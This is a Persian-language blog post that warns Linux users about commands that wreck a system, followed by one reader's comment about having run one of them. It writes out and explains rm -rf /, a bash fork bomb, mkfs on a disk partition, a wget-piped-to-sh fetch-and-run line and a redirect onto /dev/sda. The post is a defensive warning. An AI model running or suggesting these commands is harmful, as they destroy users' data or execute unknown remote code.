فرامینی که در ترمینال لینوکس اجرا می‌شوند، به واسطه اینکه لینوکس هرگز از شما برای تاییدش چیزی نمی‌پرسد، بسیار قدرتمند به نظر می‌آیند. این سیستم عامل حتی زمانی که فرمان شما باعث خرابی آن شود نیز چیزی نخواهد گفت و بسیار پیش آمده که فرامینی به صورت شوخی یا خرابکارانه به کاربر داده شده و او بعد از اجرایش دچار مشکل می‌شود. بعضی از معروف‌ترین این فرامین در زیر آورده شده تا شما نیز دچار این مشکل نشوید.

  • نکته: این فرامین در اوبونتو تنها با وجود عبارت sudo خطرناکند، چون در غیر این صورت کلا اجرا نمی‌شوند. در دیگر نسخه‌های لینوکس اما به همین صورت که آورده شده اجرا می‌شوند.
  • تغییر IP لینوکس به وسیله ترمینال Command Line

rm -rf /  (پاک کردن همه چیز!)

  • فرمان rm -rf /  هر آن چیزی که دارید را پاک خواهد کرد، از جمله فایل‌های سیستمی و حتی هارد یا مموری‌های جانبی که در آن لحظه به دستگاه شما متصل هستند. اگر این فرمان را بیشتر برایتان واکاوی کنیم به ماهیتش پی خواهید برد؛

rm  : پاک کردن فایل‌هایی که در ادامه آمده
-rf :  پاک کردن فایل‌ها و فولدرهایی که در فولدر پیش رو آمده و پاک کردن فوری آن‌ها بدون اطلاع دادن به کاربر
/ : پوشه روت که در واقع همه چیز کامپیوتر را شامل می‌شود

سیستم عامل لینوکس نیز با شادمانی این فرمان را دنبال کرده و هر چه که دارید را پاک می‌کند. فرمان rm ممکن است با حالت‌های – rm -rf ~ که تمام فایل‌های شما در پوشه خانگی و  rm -rf .*  که فایل‌های تنظیمات شما را پاک می‌کند نیز به کار برده می‌شود.

:(){ :|: & };: (بمب چنگالی)

  • کدی که در بالا آورده‌ایم ظاهر ساده‌ای دارد اما با توجه به ساختار شاخه‌ای‌اش، بسیار خطرناک است. در واقع این کد سلسله‌ای از فرامین را اجرا می‌کند که به کپی کردن خود به صورت مدام و جایگزین شدنش با نسخه قبلی را شامل شده و به سرعت CPU و رم را پر می‌کند و باعث اختلال در عملکرد دستگاه و در نهایت از کار افتادنش می‌شود. ساختاری که در عکس پایین نشان می‌دهیم نشان‌گر چگونگی عملکرد آن است
  • ۵ راه حل عالی برای جذاب‌تر شدن صفحه دسکتاپ در لینوکس

mkfs.ext4 /dev/sda1 (پاک کردن هارد)

درک این کد خیلی ساده است؛

  • mkfs.ext4 : ساخت فایل سیستم ext4  در دستگاه
    /dev/sda1 : تعیین اولویت هارد و اولین پارتیشن آن که مسلما هاردی است که از آن استفاده می‌کنید
  • و به همراه هم در نهایت این فایل دستور فرمت کردن فایل‌های شما و جایگزینی آن با فایل‌های سیستمی جدید را صادر می‌کند. این دستور به شکل دیگری نیز خطرناک است: mkfs.ext3 /dev/sdb2  که در واقع پارتیشن دوم و به همین ترتیب پارتیشن‌های بعدی خواهد بود. همچنین نباید فراموش کنید که استفاده از /dec/sd که مستقیم دستور را در هارد می‌نویسد نیز ممکن است خطرنک باشد.
  • برترین Shellهای لینوکس کدام‌ها هستند

wget http://example.com/something -O – | sh (دانلود و اجرای اسکریپت)

  • این کد اسکریپتی را از اینترنت دانلود کرده و با توجه به اینکه آن را به sh می‌فرستد، یعنی در واقع محتوای آن اسکریپت اجرا خواهد شد. کد به این خاطر خطرناک است که شما نمی‌دانید چه اسکریپتی دانلود و اجرا شده است و با توجه به محتوایی که می‌تواند جایگزین آدرس مثال ما شود، ماهیت آن می‌تواند بسیار خطرناک باشد.

command > /dev/sda (اجرای فرامین مستقیما در هارد)

  • این کد نیز از این بابت خطرناک است که به صورت مستقیم فرمانی که بعد از command آمده را در هارد اجرا می‌کند و این فرمان می‌تواند هر چیزی باشد. در واقع این کد به خودی خود مشکلی ایجاد نمی‌کند، اما اینکه همچین ساختاری را از جایی کپی و اجرا کنید با توجه به اینکه محتوا می‌تواند چیزی خطرناک باشد، در نهایت شما را در معرض خطر قرار خواهد داد.

Join the Conversation

1 Comment

  1. خخخ . من یه بار اولی رو زدم . تو انجمن لینوکس بود گفتم بزنم چون گفته بود برای تیون اپ بود .
    زدم . کامپیوتر رو ری استارت کردم . گراب اومد -ـ-
    کلی بهش فهش دادم .
    شما هم لطفا اگه کامندی میزنین یهکم تو گوگل راجبش تحقیق کنید و بعد بزنین 🙂
    تا مثل من دوباتره نرین ۳ گیگ دانلود کنین . 🙁

Leave a comment

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *